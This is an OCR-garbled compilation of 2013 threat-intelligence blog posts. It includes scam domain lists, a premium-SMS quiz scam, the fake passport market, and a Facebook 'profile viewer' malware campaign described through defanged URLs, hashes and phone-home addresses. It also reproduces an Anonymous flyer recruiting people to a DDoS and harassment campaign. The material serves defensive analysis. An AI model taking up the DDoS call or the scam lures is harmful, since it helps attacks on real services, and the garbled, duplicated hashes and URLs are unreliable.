redirectofferpage.com 
reinsurvey.net 
rentube.com 
rep.ppmate.com 
repeatest.net 
ruralaresdubai.net.in 
sappygirls.com 
scensurvey.net 
securitytube.com 
seehomevids.com 
stratest.net 
sumotorrents.com 
sunsurvey.net 
superquestionquiz.net 
supersurveygroup.net 
supersurveysite.net 
survey-masters.net 
2surveyablsoute.net 
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surveyaboutyou.net 
surveyacout.net 
surveyalot.net 
surveyanyone.net 
surveyask.net 
surveyassistant.net 
surveylatest.net 
surveyorster.net 
susan.com 
testabled.net 
testables.net 
testabling.net 
testand.net 
testants.net 
testatus.net 
testaura.net 
testaustralia.com 
testeradjective.com 
testeradvice.com 
testeraid.com 
testic.net 
testical.net 
testige.net 
testigious.net 
testingacacdemy.net 


testingadvantage.net 


testingadvice.net 
testingadwords.net 


testingagainagain.net 


testingame.net 
testion.net 
testivate.net 
testself.net 
tetsurvey.net 
thegreatanswer.com 
thenamequiz.net 
thequestionpoll.net 


thesurveyresearch.net 


thosurvey.net 
tmobilw.com 
toutsurvey.net 
toyotest.net 
tsurvey.net 
tube99.com 
tunehang.net 
tunelevel.net 
tunemake.net 
tuneoppose.net 
tuneparity.net 
tuneservice.net 
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tuneset.net 
tunesteady.net 
tunetie.net 

twittee.com 
unionbank.org 
unsurvey.net 
update.ppmate.com 
usagreatlink.com 
vacationcellular.net 
vintagetownbazar.co.in 
watchyoutube.com 
webwordquiz.net 
weighfit.net 
weighmake.net 
weighmend.net 
weighparity.net 
weighpolish.net 
weightighten.net 
wesurvey.net 
wickapidea.com 
wickepidia.com 
worldcityonline.com 
wuizforcash.com 
www-yuotube.com 
www.ammoneta.com 
www.downloadsmovies.com 
www.foxchannel.com 
www.hack-facebook.com 
www.securitytube.com 
www.tmobilw.com 
www.windycitywatchdog.com 
www. youtrube.com 
www.youtubemobile.com 
www.youtuve.com 
wwwquestionnairesurveys.com 
wwwtoutube.com 
yahoomailk.com 
yaotube.com 
yautube.com 
yootube.com 
yotobe.com 
youbube.com 
yourhomesurvey.net 
yourownsurvey.net 
yoursurveysite.net 
yourtopsite.com 
youtsurvey.net 
youtubemobile.com 
youtubi.com 
youtuhe.com 
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youtuve.com 
ypoutube.com 
yuvuty.com 
zerosurvey.net 


Thank You 


May 24, 2013 


As well as the following malicious MD5s phoning back to the same IP in the past: 
[1JMD5: e315a877c58773ce82cc32fc192bdfa5 


[2]MD5: 1cd4c2a2b2143689b185e064dc6c331c 
[3]MD5: 26c5102e75daf3d3c696ad719bc55ad4 
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IZE 


Select your country || 


Welcome to Prizerally! 


Prizerally is is the new innovative mobilecontent brand where you can play sticky skill based quizzes and have a chance to win amazing prizes! 
Varying from Iphones to Ipads. Prizerally offers prizes everybody likes! 


With its carefully selected questions, Prizerally makes sure you are challenged every week with up to date questions varying between 
different categories and different levels of difficulty. 


Don't miss out and make sure you take on the challenge! 
Prizerally 
© 7013 AM Rights Reserves Prinerally 


Prizerally’s scheme is fairly simple: 


Service costs £3 per question played and a £4,50 sign up fee applies. You will receive 
an additional £1.50 charge for a reminder message tomorrow. Winners will be contacted 
every first businessweek of the month, all question entries must be received before 00.00 
on the last day of the month. This is not a subscription service. Minimum age 18+ with 
bill payer’s permission. One prize available per service per month. Customer service: call 
0800 408 0796, email uk@prizerally.com or visit the website: www.prizerally.com. Play the 
game on your mobile. The winner will be selected among all participants in the first business 
week of every month. When participating you acknowledge that you agree to the terms & 
conditions, you are a resident of the UK, 18 years or older and authorized account holder 
and/or that you have the consent of the accountholder. £3 per question. This service is a 
product of Mypengo Mobile. Free entry method: send an email with your name, phonenumber, 
and prize you want to win to info@prizerally.com. Prizerally is not affiliated with, sponsored 
by or endorsed by any of the listed products or retailers. Trademarks, service marks, logos 
(including, without limitation, the individual names of products and retailers) are the property 
of their respective owners. When you see one of our Products on the Internet, you can start 
receiving our content via SMS (i.e. text message). You can enter your mobile telephone 
number on the landing pages via the Internet and confirm your registration. You hereby agree 
to the Terms and Conditions. Prizerally charges you £3,00 per question played. Each sent 
answer will be followed by a new question. If you stop sending answers you will not receive 
any more messages. Once stopped you will receive one extra £1,50 reminder message. To 
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stop this message, simply text STOP to 85150. From this moment on you have to decide on 
your own if you will continue to play for more points. By answering a question, you will receive 
a new messages containing a new puzzel/question also chargeble at £ 1,50 per text message 
received. When you stop sending answers the game will end. O2 and Orange customers can 
only spend the maximum amount of £ 30.00 a day. This spending cap applies for one day, so 
the next day these customers are eligble to play again. The maximum amount you can spend 
on our Prizerally service is £ 99.00. 


Facebook has been notified. The rogue Chrome extension has already been removed. 


Updates will be posted as soon as new developments take place. 
if 


https: //www.virustotal .com/en/file/0329bd90de1ad1608bf e91210b66929caeb99a057 4bb1008123b95c7b1b0e756/analys 


2. 


7, 
s/ 


https: //www.virustotal .com/en/file/35c970ae66dde7688e55a87860c8bc60d8ab3£502437448e0ea60df c19659499/analys 


3. 


https: //www.virustotal . com/en/file/58337863b283df cc03f ef 8614a821b2b63f£b018cb14f 2353e97da4d42110b6d1/analys 


9.5.4 A Peek Inside the Russian Underground Market for Fake Docu- 
ments/IDs/Passports (2013-05-25 18:52) 


[1]Fake IDs/fake passports have always been a hot [2]commodity within the cybercrime 
ecosystem. 


Thanks to their general availability and affordable prices - naturally based on the qual- 
ity that a potential cybercriminal/fraudster is seeking - the vendors behind them continue 
undermining the trust chain that society/market thrives on, by empowering cybercriminals 
and fugitives with new IDs to be later on used in related fraudulent activities. 
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In this post, I’ll sample fraudulent activity on the Russian underground marketplace, fea- 
ture exclusive screenshots of fake passports currently offered for sale, and discuss how 
relatively low profile cybercriminals have been literally generating fake (Russian) passports 
for years, primarily relying on DIY passport/stamp generating tools. 


Sample screenshots of the inventory of available fake passports for multiple countries: 
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Affected countries include: Russia, Belarus, Canada, Germany, Denmark, Finland, Israel, 
Netherlands (Holland), Norway, Romania, United Kingdom, United States, Australia, Ukraine. 


The prices vary between $20-30, and according to the vendors, use real people’s data/photos 
etc. 


It’s also worth emphasizing on the fact that, of all the countries, Russia’s underground 
marketplace for fake documents is perhaps the most vibrant one. Next to high-quality fake 
documments/IDs/passports, they’re naturally the cheap alternatives, which Russian fraudsters 


have been literally generating for years, relying on DIY (do-it-yourself) tools/stamp editors like 
these: 
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Thanks to the demand for such kind of underground market assets, I’m certain that that 
market would continue flourishing, and would eventually reach a stage where the vendors 
would start sacrificing OPSEC (Operational Security) in an attempt to reach customers from 
virtually every country. With localization on demand services proliferating, next to the 
ubiquitous for the cybercrime ecosystem, affiliate based revenue-sharing models, vendors of 
fake documents/IDs/passports, have virtually everything that they need at their disposal, if 
they were to start targeting the international audience. 


This post has been reproduced from [3]Dancho Danchev’s blog. Follow him 
[4]Jon Twitter. 


1. http://www.team-cymru.com/ReadingRoom/Whitepapers/2010/FakeID_in_the_Underground_Economy. pdf 
2 

3. 
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9.5.5 A Peek Inside the Russian Underground Market for Fake Docu- 
ments/IDs/Passports (2013-05-25 18:52) 
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[1]Fake IDs/fake passports have always been a hot [2]commodity within the cybercrime 
ecosystem. 


Thanks to their general availability and affordable prices - naturally based on the qual- 
ity that a potential cybercriminal/fraudster is seeking - the vendors behind them continue 
undermining the trust chain that society/market thrives on, by empowering cybercriminals 
and fugitives with new IDs to be later on used in related fraudulent activities. 


In this post, I’ll sample fraudulent activity on the Russian underground marketplace, fea- 
ture exclusive screenshots of fake passports currently offered for sale, and discuss how 
relatively low profile cybercriminals have been literally generating fake (Russian) passports 
for years, primarily relying on DIY passport/stamp generating tools. 


Sample screenshots of the inventory of available fake passports for multiple countries: 
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Affected countries include: Russia, Belarus, Canada, Germany, Denmark, Finland, Israel, 
Netherlands (Holland), Norway, Romania, United Kingdom, United States, Australia, Ukraine. 


The prices vary between $20-30, and according to the vendors, use real people’s data/photos 
etc. 


It’s also worth emphasizing on the fact that, of all the countries, Russia’s underground 
marketplace for fake documents is perhaps the most vibrant one. Next to high-quality fake 
documments/IDs/passports, they’re naturally the cheap alternatives, which Russian fraudsters 
have been literally generating for years, relying on DIY (do-it-yourself) tools/stamp editors like 
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Thanks to the demand for such kind of underground market assets, I’m certain that that 
market would continue flourishing, and would eventually reach a stage where the vendors 
would start sacrificing OPSEC (Operational Security) in an attempt to reach customers from 
virtually every country. With localization on demand services proliferating, next to the 
ubiquitous for the cybercrime ecosystem, affiliate based revenue-sharing models, vendors of 
fake documents/IDs/passports, have virtually everything that they need at their disposal, if 
they were to start targeting the international audience. 


1. http://www.team-cymru. com/ReadingRoom/Whitepapers/2010/FakeID_in_the_Underground_Economy. pdf 


2. http: //ddanchev. blogspot. com/2011/10/exposing-market-for-stolen-credit-cards.htm 
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9.6 June 


9.6.1 Summarizing Webroot’s Threat Blog Posts for May (2013-06-04 15:24) 


threat blog 


Products Support Community & Resources Partners About Webroot About the Bloggers 


New E-shop sells access to thousands of hacked 
PCs, accepts Bitcoin 


Parerarere e 1 Votes 


By Dancho Danchev 

Remember the E-shop offering access to hacked PCs, based on malware ‘executions’ hat we profiled last month? 
We have recently spotted a newly launched, competing E-shop, once again seling access to hacked PC: 
ons’. However, es bre. there's no limet to the use 0 
Vice has a higher probabilty of ectlednn i narket efficiency compared to thei “cofeague.” Additionally, the botnet 
raster worl have to manually verify the presence of bot killers ard will basicaly aim to sell access to as many hacked PCs as 


More details 


Continue reading —- 


Tell your trienets: Wi Facerock 2 C) twee 2 os Googe +s Gi untean) ch Reost El Eman [swore 


Like thie 


ware. Malware. securty, Set | Leave a comment 


nt FiP/S SH account Bi 
ing mass i me em i i pla srm 
released on the underground marketplace 


Parana ° 4 Votes 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for May, 2013. 
You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]FedWire ‘Your Wire Transfer’ themed emails lead to malware 

02. [4]A peek inside a CVE-2013-0422 exploiting DIY malicious Java applet generating tool 
03. [5]New IRC/HTTP based DDoS bot wipes out competing malware 

04. [6]New version of DIY Google Dorks based mass website hacking tool spotted in the wild 
05. [7]Citibank ‘Merchant Billing Statement’ themed emails lead to malware 

06. [8]Fake Amazon ‘Your Kindle E-Book Order’ themed emails circulating in the wild, lead to 
client-side exploits and malware 

07. [9]Cybercriminals impersonate New York State’s Department of Motor Vehicles (DMV), 
serve malware 
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08. [10]Cybercriminals offer HTTP-based keylogger for sale, accept Bitcoin 

09. [11]Newly launched E-shop for hacked PCs charges based on malware ‘executions’ 

10. [12]New subscription-based ‘stealth Bitcoin miner’ spotted in the wild 

11. [13]Fake ‘Free Media Player’ distributed via rogue ‘Adobe Flash Player HD’ advertisement 
12. [14]Newly launched ‘Magic Malware’ spam campaign relies on bogus ‘New MMS’ messages 
13. [15]Commercial ‘form grabbing’ rootkit spotted in the wild 

14. [16]DIY malware cryptor as a Web service spotted in the wild - part two 

15. [17]CVs and sensitive info soliciting email campaign impersonates NATO 

16. [18]New commercially available DIY invisible Bitcoin miner spotted in the wild 

17. [19]Fake ‘Export License/Payment Invoice’ themed emails lead to malware 

18. [20]Compromised Indian government Web site leads to Black Hole Exploit Kit 

19, [21]Cybercriminals resume spamvertising Citibank ‘Merchant Billing Statement’ themed 
emails, serve malware 

20. [22]Marijuana-themed DDoS for hire service spotted in the wild 

21. [23]Fake ‘Vodafone U.K Images’ themed malware serving spam campaign circulating in 
the wild 


This post has been reproduced from [24]Dancho Danchev’s blog. Follow him 
[25]Jon Twitter. 


. http://blog.webroot.com/ 


1 
2. http://feeds2.feedburner.com/WebrootThreatBlog 
3 


ttp://blog. webroot .com/2013/05/01/fedwire-your-wire-transfer-themed-emails-lead-to-malware/ 


4. http://blog.webroot .com/2013/05/02/a-peek- inside-a- cve-2013-0422-exploiting-diy-malicious- java-applet-ge 


5. http://blog. webroot. com/2013/05/03/new-irchttp-—based-ddos-bot-wipes-out-competing-malware/ 


6. http://blog. webroot .com/2013/05/06/new-version-of-diy-google-dorks—based-mass-website-hacking-tool-spotte 


d-in-the-wild/ 


7. http://blog. webroot .com/2013/05/07/citibank-merchant-billing-statement-themed-emails-lead-to-malware/ 


ttp://blog.webroot .com/2013/05/08/fake-amazon- your-kindle-e-book- order-themed- emails-circulating-in-the- 


ild-lead-to-client-side-exploits-and-malware/ 


9. http://blog. webroot .com/2013/05/09/cybercriminals-impersonate-new-york-states-department-of-motor-vehicle 


s-dmv-serve-malware/ 


10. http://blog.webroot .com/2013/05/10/cybercriminals-offer-http-based-keylogger-for-sale-accept-bitcoin/ 


13. http://blog.webroot .com/2013/05/15/fake-free-media-player-distributed-via-rogue-adobe-flash-player-hd- 


dvertisement/ 


14. http://blog. webroot .com/2013/05/17/newly-launched-magic-malware-spam-campaign-relies-on-bogus-new-mms-m 


15. http://blog.webroot .com/2013/05/17/commercial-form-grabbing-rootkit-spotted-in-the-wild/ 


16. http://blog.webroot .com/2013/05/20/diy-malware-cryptor-as-a-web-service-spotted-in-the-wild-part-two/ 


17. http://blog. webroot .com/2013/05/21/cvs-and-sensitive-info-soliciting-email-campaign-impersonates-nato/ 


18. http://blog. webroot. com/2013/05/22/new- commercially-available-diy-invisible-bitcoin-miner-spotted-in-t 


19. http://blog.webroot .com/2013/05/23/fake-export-licensepayment-invoice-themed-emails-lead-to-malware/ 


20. http://blog. webroot .com/2013/05/24/compromised-indian-government-web-site-leads-to-black-hole-exploit-k 
it/ 
21. http://blog.webroot .com/2013/05/29/cybercriminals-resume-spamvertising-citibank-merchant-billing-statem 


ent-themed-emails-serve-malware/ 


22. http://blog.webroot . com/2013/05/30/mari juana-themed-ddos-for-hire-service-spotted-in-the-wild/ 


23. http://blog.webroot .com/2013/05/31/fake-vodaf one-u-k- images-themed-malware-serving-spam-campaign-circu 
24, 
25. 


9.6.2 Malware-Serving "Who’s Viewed Your Facebook Profile" Campaign Spreading 
Across Facebook (2013-06-10 15:07) 


a) 


My profile has been viewed today 2195 times. 
Top 5 Visitors: 


i i - 137 visits 

2- raft - 65 visits 

3- sk eee 40 visits 
4- - 23 visits 

5- akra - 20 visits 


See who has viewed your profile HERE: 


http://cnlz3.tk/?2959858 Cd 49 others 


Like * Comment 


A currently ongoing Facebook spreading malware-serving campaign, entices users into 
downloading and executing a malicious executable, pretending to be a "Who’s Viewed Your 
Facebook Profile" extension. In reality though, the executable, part of a campaign that’s been 
ongoing for several months, will steal private information from local browsers, will auto-start 
on Windows starup, and will attempt to infect all of the victim’s friends across Facebook. 


The executable, including several other related executables part of the campaign, are 
currently hosted on Google Code, and according to Google Code’s statistics, one of the mali- 
cious files has already been downloaded 1,870,788 times. Surprisingly, the Coode Project is 
called "Project Don’t Downloaa". Very interesting self-contradicting social engineering attempt. 


Let’s dissect the campaign, list the domain’s portfolio used in it, provide detection rates 
for the malicious executables, and connect the campaign to multiple other campaigns ob- 
served in the wild over the last couple of weeks. 


[1] 
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Who Viewed Your 
N Profile 


More ways to experience Facebook 


Introducing the new “Who Viewed Your 
Profile” feature on facebook! 


INSTALL 


Sample redirection chain: 

hxxp://cnlz3.tk/?2959858 -> hxxp://profilelo.8c1.net/-> hxxp://profileste.uni.me/?skuwjjsadsuquw- 
hdas -> _ hxxps://project-dont-download.googlecode.com/files/Profile %20View %20- 
%205v2.exe 


Subdomain reconnaissance: 

profilelo.8cl.net - 82.208.40.3 

profileste.uni.me - 198.23.52.98 
project-dont-download.googlecode.com - Email: mergimil4@live.com 


Detection rate for the malicious executable: [2]MD5: c5b2247a37a8d26063af55c6c975782d - 
detected by 23 out of 47 antivirus scanners as JS:Clicker-P [Trj]; RDN/Generic.dx!chs 


Once executed, the sample drops the following MD5s on the affected hosts: 
MD5: 3729796a618de670128e80bb750dba35 

MD5: bc5ea93000fd79cf3d874567068adfc5 

MD5: 3448d5a74e86fdc88569df99dbc19c55 

MD5: c3c67c3df487390dfdfa4890832b8a46 

MD5: 161fff31429f1 fcd99a56208cf9d2b58 

MD5: c&8dfbeb2e89a9557523b5a5/7619a9c44 
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MD5: b83d2283066c68e8cc448c578dd121laa 
MD5: 0€254726843ed308ca142333ea0c5d28 
MD5: cbb6e03d0b08ba4a8eeac1467921b7dd 
MD5: a3ef72a0345a564bde3df2654f384a21 
MD5: 123c9d897b74548aa6ce65b456a8b732 
MD5: 181f01156f23d4e732a414eaa2f6b870 
MD5: 74d4b4298bc6fe8871ad1aa654d347c6 


(P)} project-dont-download 


Diagn neon, 


Download statistics for the malicious executables hosted on Google Code: 
Profile Viewer - 5.exe - 1,870,788 downloads 

Profile Stalker - V.exe - 45983 downloads 

Profile View - 5v2.exe - 9496 downloads 

Profile Stalker - D.exe - 2 downloads 


Detection rates for the malicious executables hosted on Google Code: 

Profile Stalker - D.exe - [3]MD5: c9220176786fe074de210529570959c5 - detected by 3 out of 
47 antivirus scanners as Trojan.AVKill.30538; JS/TrojanClicker.Agent.NDL 

Profile Stalker - V.exe - [4]MD5: a6073378d764e3af4cb289cac91b3f97 - detected by 24 out of 
47 antivirus scanners as JS/TrojanClicker.Agent.NDL; Trojan.Win32.Clicker!BT 

Profile Viewer - 5.exe - [5]MD5: 814837294bc34f288e31637bab955e6c - detected by 24 out 
of 47 antivirus scanners as Troj/Agent-ABOE 


Samples phone back to the followind URLs/domains: 
hxxp.//stats.app-data.net/installer.gif?action=started &browser=ie6 &ver=1 _26 
_153 &bic=00A473047B09414785A7A54908970321/E &app=30413 &appver=0 
&verifier=d3459d462f931bel10f76456d86fe24d5 &srcid=0 &subid=O0 &zdata=O &ff=0 
&ch=0 &default=ie &os=XP32 &admin=1 &type=1 &asw=0 


stats.app-data.net - 207.171.163.139 
app-static.crossrider.com - 69.16.175.10 
errors.app-data.net - 207.171.163.139 


Facebook and Google have been notified. 


This post has been reproduced from [6]Dancho Danchev’s blog. Follow him 
[7]Jon Twitter. 


1. http://1.bp.blogspot .com/-1xZJezC4rz0/UbW86IHzcBI/AAAAAAAAFu0/dmQ14sZpxgg/s1600/Whos_Viewed_Your_Facebook 


Profile_Fake_Rogue_Extension.png 
2. https://www.virustotal .com/en/file/7b5£495dbc987f 16c1£331141dd9dd62a8066503226d5bf 457 cbd5875515a600/analys 


3. https://www.virustotal .com/en/file/5a2729550420e40836f d2f5e2bb42f e4b9d36dd3f bbOF 12f.c05b829b5e295£80/analys 
is/1370862388/ 


ttps://www.virustotal.com/en/file/07ac717f£288cdee6c5b6ef 4eeda86f90892ef 26fd11c7aaci1ea6401a7dcc2e6/analys 


is/1370862459/ 


5. https://www.virustotal .com/en/file/de7e13991bbbe84c6470c070d675cef f 1f07b3££3c545ca53b33ebbc1790b9c9/analys 


is/1370862551/ 
. http: //ddanchev.blogspot.com/ 


. http://twitter.com/danchodanche 


> 
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9.6.3 Malware-Serving "Who’s Viewed Your Facebook Profile" Campaign Spreading 
Across Facebook (2013-06-10 15:07) 


a 


My profile has been viewed today 2195 times. 
Top 5 Visitors: 


1- - 137 visits 

2- raft - 65 visits 

3- kneel 40 visits 
4- - 23 visits 

A akra - 20 visits 


See who has viewed your profile HERE: 


http://cnlz3.tk/?2959858 Cd 49 others 


Like * Comment 


A currently ongoing Facebook spreading malware-serving campaign, entices users into 
downloading and executing a malicious executable, pretending to be a "Who’s Viewed Your 
Facebook Profile" extension. In reality though, the executable, part of a campaign that’s been 
Ongoing for several months, will steal private information from local browsers, will auto-start 
on Windows starup, and will attempt to infect all of the victim’s friends across Facebook. 


The executable, including several other related executables part of the campaign, are 
currently hosted on Google Code, and according to Google Code’s statistics, one of the 
malicious files has already been downloaded 1,870,788 times. Surprisingly, the Coode Project 
is called "Project Don’t Download". Very interesting self-contradicting social engineering 
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attempt. 


Let’s dissect the campaign, list the domain’s portfolio used in it, provide detection rates 
for the malicious executables, and connect the campaign to multiple other campaigns ob- 
served in the wild over the last couple of weeks. 


[1] 


Who Viewed Your 
N Profile 


More ways to experience Facebook 


Introducing the new “Who Viewed Your 
Profile" feature on facebook! 
Ey v 4 t ‘ h : 


t ar , 
Stal 


INSTALL 


Sample redirection chain: 
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hxxp://cn!z3.tk/?2959858 -> hxxp://profilelo.8c1.net/-> hxxp://profileste.uni.me/?skuwjjsadsuquw- 
hdas ->  hxxps://project-dont-download.googlecode.com/files/Profile %20View %20- 
%205v2.exe 


Subdomain reconnaissance: 
profilelo.8cl.net - 82.208.40.3 
profileste.uni.me - 198.23.52.98 


project-dont-download.googlecode.com - Email: mergimil4@live.com 


Detection rate for the malicious executable: [2]MD5: c5b2247a37a8d26063af55c6c975782d - 
detected by 23 out of 47 antivirus scanners as JS:Clicker-P [Trj]; RDN/Generic.dx!chs 


Once executed, the sample drops the following MD5s on the affected hosts: 


MD5: 3729796a618de670128e80bb750dba35 
MD5: bc5ea93000fd79cf3d874567068adfc5 
MD5: 3448d5a74e86fdc88569df99dbc19c55 
MD5: c3c67c3df487390dfdfa4890832b8a46 
MD5: 161fff31429f1fcd99a56208cf9d2b58 
MDS5: c8dfbeb2e89a9557523b5a57619a9c44 
MD5: b83d2283066c68e8cc448c578dd121laa 
MD5: 0€254726843ed308ca142333ea0c5d28 
MD5: cbb6e03d0b08ba4a8eeac1467921b7dd 
MD5: a3ef72a0345a564bde3df2654f384a21 
MD5: 123c9d897b74548aa6ce65b456a8b732 
MD5: 181f01156f23d4e732a414eaa2f6b870 
MD5: 74d4b4298bc6fe8871ad1aa654d347c6 
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Pi} project-dont-download 


Pom nme 


ws 


Pepe + Inert 


8 eters 


Download statistics for the malicious executables hosted on Google Code: 
Profile Viewer - 5.exe - 1,870,788 downloads 

Profile Stalker - V.exe - 45983 downloads 

Profile View - 5v2.exe - 9496 downloads 


Profile Stalker - D.exe - 2 downloads 


Detection rates for the malicious executables hosted on Google Code: 


Profile Stalker - D.exe - [3]MD5: c9220176786fe074de210529570959c5 - detected by 3 
out of 47 antivirus scanners as Trojan.AVKill.30538; JS/TrojanClicker.Agent.NDL 


Profile Stalker - V.exe - [4JMD5: a6073378d764e3af4cb289cac91b3f97 - detected by 24 
out of 47 antivirus scanners as JS/TrojanClicker.Agent.NDL; Trojan.Win32.Clicker!BT 


Profile Viewer - 5.exe - [5]MD5: 814837294bc34f288e31637bab955e6c - detected by 24 
out of 47 antivirus scanners as Troj/Agent-ABOE 


Samples phone back to the followind URLs/domains: 


hxxp.//stats.app-data.net/installer.gif?action=started &browser=ie6 &ver=1 _26 
AS3 &bic=00A473047B09414785A7A54908970321/E &app=30413 &appver=0 
&verifier=d3459d462f931bel10f76456d86fe24d5 &srcid=0 &subid=O E&zdata=O &ff=0 
&ch=0 &default=ie &os=XP32 &admin=1 &type=1 &asw=0 
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stats.app-data.net - 207.171.163.139 
app-static.crossrider.com - 69.16.175.10 


errors.app-data.net - 207.171.163.139 
Facebook and Google have been notified. 


Updates will be posted as soon as new developments take place. 


1. http://1.bp.blogspot.com/-1xZJezC4rz0/UbW861HzcBI/ AAAAAAAAFu0/dmQ14sZpxgg/s1600/Whos_Viewed_Your_Facebook 
_Profile_Fake_Rogue_Extension.png 

2. https://www.virustotal .com/en/file/7b5£495dbc987f 16c1£331141dd9dd62a8066503226d5bf 457 cbd5875515a600/analys 
is/ 

3. https://www.virustotal .com/en/file/5a2729550420e40836f d2f5e2bb42f e4b9d36dd3f bbOF 12£c05b829b5e295£80/analys 
is/1370862388/ 

4. https://www.virustotal .com/en/file/07ac717f288cdee6c5b6ef 4eeda86Ff90892ef 26fd11c7aacilea6401a7dcc2e6/analys 
is/1370862459/ 

5. https://www.virustotal .com/en/file/de7e13991bbbe84c6470c070d675cef f 1f07b3££3c545ca53b33ebbc1790b9c9/analys 
is/1370862551/ 


9.6.4 ’Anonymous’ Group’s DDoS Operation Titstorm (2013-06-12 20:01) 


OPERATION: TITSTORM 


A PART OF OPERATION INTERNET FREEDOM 


THE ATTACK! 


1. On February 10th 8:00 AM Australian time 
we will begin a DDoS of government servers 


2. This will be quickly followed by a shitstorm 
of porn email, fax spam, black faxes, and 
prank phone calls to government offices 
(emails/faxes should focus on small-breasted 
porn, cartoon porn, and female ejaculation, 
the 3 types banned so far) 


3. Information on the targets for the shitstorm 
can be found here: 
HITP://UUULAPH.GOUAU/OPS/RORINISTRATI 
OM.HTA 


WHAT? WHEN? 


PARTICIPATE FELLOW ANONYMOUS! 


The Campaign begins.. 


8:00 AM , AUSTRALIAN TIME (GMT +10:00) 
February 10th. 


(FEBRUARY 9TH FOR 


U.S.A. AND CANADA.) 
(5:00 EST | 4:00 CST | etc. ) 


TO FULLY PARTICIPATE IN THE ATTACK: 


Use an IRC Client and connect to... 


Server: irc.anonnet.org 
Channel: #titstorm 


With last months [1]’Anonymous’ Group’s DDoS Operation Titstorm campaign a clear success 
based on the real-time monitoring of the crowdsourcing-driven attack, it’s time to take a brief 
retrospective on the tools and tactics used, and relate 


¢ Go through an analysis of 2009’s failed [2]Operation Didgeridie DDoS campaign 


Why is Operation Titstorm an important one to profile? Not only because it worked compared 
to [3]Operation Didgeridie, but also, due to the fact that crowdsourcing driven (malicious 
culture of participation) DDoS attacks have proven themselves throughout the past several 
years, as an alternative to DDoS for hire attacks. 


- DIY ICMP flooders 

- Web based multiple iFrame loaders to consume server CPU 

- Web based email bombing tools+predefined lists of emails belonging to government offi- 
cials/employees 


Go through related posts on crowdsourcing DDoS attacks/malicious culture of participa- 
tion: 

[4]Coordinated Russia vs Georgia cyber attack in progress 

[5]lranian opposition launches organized cyber attack against pro-Ahmadinejad sites 
[6]People’s Information Warfare Concept 

[7]Electronic Jihad v3.0 - What Cyber Jihad Isn’t 

[8]Electronic Jinad’s Targets List 

[9]The DDoS Attack Against CNN.com 

[10]Chinese Hacktivists Waging People’s Information Warfare Against CNN 

[11]The Russia vs Georgia Cyber Attack 

[12]Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks 
[13]Pro-lsraeli (Pseudo) Cyber Warriors Want your Bandwidth 

[14]lranian Opposition DDoS-es pro-Ahmadinejad Sites 


This post has been reproduced from [15]Dancho Danchev’s blog. Follow him [16]on Twitter. 


py 


ttp://www.smh.com.au/technology/technology-news/operation-titstorm-hackers-bring-down-government-website 


-20100210-ngku.htm 


s 
2 
3 

4 

5 

6 
8. 


http: //ddanchev. blogspot .com/2007/11/electronic- jihad-v30-what-cyber-jihad.htm 


10. 
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7 
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12. http://ddanchev. blogspot .com/2008/10/real-time-osint-vs-historical-osint-in.htm 
13. http://ddanchev. blogspot .com/2009/01/pro-israeli-pseudo-cyber-warriors-want.htm 
14. http://ddanchev. blogspot .com/2009/06/iranian-opposition-ddos-es-pro.htm 


15. http://ddanchev. blogspot .com/ 
16. http://twitter.com/danchodanche 


9.6.5 Bogus "Shocking Video" Content at Scribd Exposes Malware Monetization 
Scheme Through Parked Domains (2013-06-20 22:44) 


Ra Add Note coJL nk <>Embec ff Save + — fal [+] of1 


OIL RIG EXPLOSION 


WATCH THIS HOT VIDEO >> 
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Bogus content populating Scribd, centralized malicious/typosquatted/parked do- 
mains/fraudulent infrastructure, combined with dozens of malware samples phoning back to 
this very same infrastructure to monetize the fraudulently generated traffic, it doesn’t get any 
better than this, does it? 


URL redirection chain: 


hxxp://papaver.in/shocking/scr68237 -> hxxp://dsnetservices.com/?ep!=98EbooDNw_Lit- 
gQViA4tbYD7ZJMZAQuEUyV387pMY NBODmsO0CdAg9qAe5QvBgKT O6xW6jHW1iYo5F8yDIvYx 


7Aavd8wLHMZWHDIItbG4Eta-GVti03i9LInzyKOYgWmT2BOaEeaipahFIE8yB7MC - 
EBrQzXXtQBVUSIMGIEwTo9iUpOlyDUOM 


OmZKYzSpf6qGIAAgGYN _vvwAA4H8BAABAgFsLAADgPokxWVMmWUExNmhaQqA AAADw_ - 
> monetization through Google/MSN 
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Ej Ade Note Cad Lins <€ > Embed Q Save for later + — el of! 


GLENN BECK RALLY ATTENDANCE: 


UNCENSORED VIDEO!! I'M SHOCKED 


WATCH THIS HOT VIDEO >> 


Domain names reconnaissance: 
papaver.in - 69.43.161.176 - Email: belcanto@hushmail.com - Belcanto Investment Group 


dsnetservices.com - 208.73.211.152 - Email: admin@overseedomainmanagement.com - 
Oversee Domain Management, LLC 
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= - i 
www.scribd.com/doc/37 1 14664/bleach-rangiku-hentai-shocking-video * 


Apr 28, 2013 - BLEACH RANGIKU HENTAI - SHOCKING VIDEO! - Free download or 
teadfalse online for free. 


NOAH WYLE SEPARATES FROM WIFE - SHOCKING VIDEO! - Scribd 
www.scridd.com/doc/.../noan-wyle-separates-from-wife-shocking-video 

Apr 28, 2013 - NOAH WYLE SEPARATES FROM WIFE - SHOCKING VIDEO! - Free 
download as PDF File (.pdf), Word Doc (.doc), Text File (.txt) or read online ... 


www.scridd com/doc/37126294/pokemon-dawn-hental-shocking-video ~ 
Apr 28, 2013 - POKEMON DAWN HENTAI - SHOCKING VIDEO! - Free download as 
POF File (pdf), Word Doc (.doc), Text File (.txt) or read online for free. 


P - fl = j 
www.scribd.com/doc/.../akshay-kumar-nude-naked-shocking-video + 


Apr 28, 2013 - AKSHAY KUMAR NUDE - NAKED - SHOCKING VIDEO! - Free 
download as Word Doc (.doc), Text file (txt), PDF File (.pdf) or read online for ... 


www.scribd.comy.../bleac -free-bieach-ichigo-bleach-e-hentai-tagged-sh... 
Apr 28, 2013 - BLEACH FREE BLEACH ICHIGO BLEACH E-HENTA! TAGGED - 
SHOCKING VIDEO! - Free download or readfalse online for free. 


BLEACH HENTAI ENGLISH - SHOCKING VIDEO! - Scribd 
www.scridd comvdoc/37117078/bieach-hentai-english-shocking-video + 

Apr 28, 2013 - BLEACH HENTAI ENGLISH - SHOCKING VIDEO! - Free download or 
readfalse online for free. 


www.scribd.com/doc/37117012/bleach-hentai-cartoon-shocking-video ~ 
Apr 28, 2013 - BLEACH HENTAI CARTOON - SHOCKING VIDEO! - Free download as 
POF File (.pdf), Word Doc (.doc), Text File (txt) or read online for free. 


